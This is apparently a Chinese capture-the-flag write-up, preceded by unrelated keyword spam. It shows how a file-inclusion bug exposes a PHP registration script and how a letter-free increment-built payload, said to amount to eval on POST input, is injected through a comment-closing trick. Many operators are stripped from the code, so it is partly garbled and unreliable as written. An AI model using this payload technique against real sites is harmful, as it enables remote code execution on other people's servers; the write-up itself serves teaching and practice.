网站课程设计报告,哪家做网站,网站设计协议,展示型网站功能文章目录 涉及知识点解题过程 涉及知识点
无数字字母RCE自增马构造文件包含读取源码
解题过程
打开题目#xff0c;随便注册一个用户为admin 登陆进去后#xff0c;一眼发现杰哥图片有线索 我们F12看一下如何请求的 在这里发现可能存在文件包含漏洞
我们尝试读取下源码
… 文章目录 涉及知识点解题过程 涉及知识点
无数字字母RCE自增马构造文件包含读取源码
解题过程
打开题目随便注册一个用户为admin 登陆进去后一眼发现杰哥图片有线索 我们F12看一下如何请求的 在这里发现可能存在文件包含漏洞
我们尝试读取下源码
./get_pic.php?imageindex.php然后base64解码一下直接看核心部分
?php
error_reporting(0);
if(isset($_POST[user]) isset($_POST[pass])){$hash_user md5($_POST[user]);$hash_pass zsf.md5($_POST[pass]);if(isset($_POST[punctuation])){//filterif (strlen($_POST[user]) 6){echo(scriptalert(Username is too long!);/script);}elseif(strlen($_POST[website]) 25){echo(scriptalert(Website is too long!);/script);}elseif(strlen($_POST[punctuation]) 1000){echo(scriptalert(Punctuation is too long!);/script);}else{if(preg_match(/[^\w\/\(\)\*]/, $_POST[user]) 0){if (preg_match(/[^\w\/\*:\.\;\(\)\n]/, $_POST[website]) 0){$_POST[punctuation] preg_replace(/[a-z,A-Z,0-9\?]/,,$_POST[punctuation]);$template file_get_contents(./template.html);$content str_replace(__USER__, $_POST[user], $template);$content str_replace(__PASS__, $hash_pass, $content);$content str_replace(__WEBSITE__, $_POST[website], $content);$content str_replace(__PUNC__, $_POST[punctuation], $content);file_put_contents(sandbox/.$hash_user..php, $content);echo(scriptalert(Successed!);/script);}else{echo(scriptalert(Invalid chars in website!);/script);}}else{echo(scriptalert(Invalid chars in username!);/script);}}}else{setcookie(user, $_POST[user], time()3600);setcookie(pass, $hash_pass, time()3600);Header(Location:sandbox/$hash_user.php);}
}
?在这里可以看到userwebsite都做了严格的过滤并且限制输入长度 但是观察到strlen($_POST[punctuation]) 1000猜测这是利用的突破口 观察到是无字母数字RCE那么大概思路就是自增构造
我们再读取一下源码中的./template.html 解码完发现很长这里只展示有用的部分
div idstart_block a title开始 idstart_btn/adiv idstart_itemul classitem adminlispan classadminImg/span?phperror_reporting(0);$user ((string)__USER__);$pass ((string)__PASS__);if(isset($_COOKIE[user]) isset($_COOKIE[pass]) $_COOKIE[user] $user $_COOKIE[pass] $pass){echo($_COOKIE[user]);}else{die(scriptalert(Permission denied!);/script);}?/li/ulul classitemlispan classsitting_btn/span系统设置/lilispan classhelp_btn/span使用指南 b/b/lilispan classabout_btn/span关于我们/lilispan classlogout_btn/span退出系统/li/ul/div/div
/div
a href# classpowered_by__PUNC__/a分析一下(string)__USER__会将__USER__强转成string类型。 然后利用点已经知道是无数字字母RCE?php被禁了那么只能利用代码前面自带的?php去shell 我们选择可以利用注释符注释然后用);闭合回去__PUNC__写exp再把下面的注释掉。 具体执行如下
__PUNC__的exp
$_[];$_$_;$_$_[!];$___$_;$__$_;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$___.$__;$___.$__;$__$_;$__;$__;$__;$__;$___.$__;$__$_;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$___.$__;$__$_;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$___.$__;$_____;$__$_;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$____.$__;$__$_;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$____.$__;$__$_;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$____.$__;$__$_;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$____.$__;$_$$____;$___($_[_]);所以我们注册
//注册页面
user:a/*
passwd:a
website:a
punctuation:*/);$_[];$_$_;$_$_[!];$___$_;$__$_;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$___.$__;$___.$__;$__$_;$__;$__;$__;$__;$___.$__;$__$_;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$___.$__;$__$_;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$___.$__;$_____;$__$_;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$____.$__;$__$_;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$____.$__;$__$_;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$____.$__;$__$_;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$__;$____.$__;$_$$____;$___($_[_]);/*//这个自增代表的是eval(_POST[_]);注册成功后命令执行一下 回显在页面源代码最下面找到报错无关紧要
得到flag
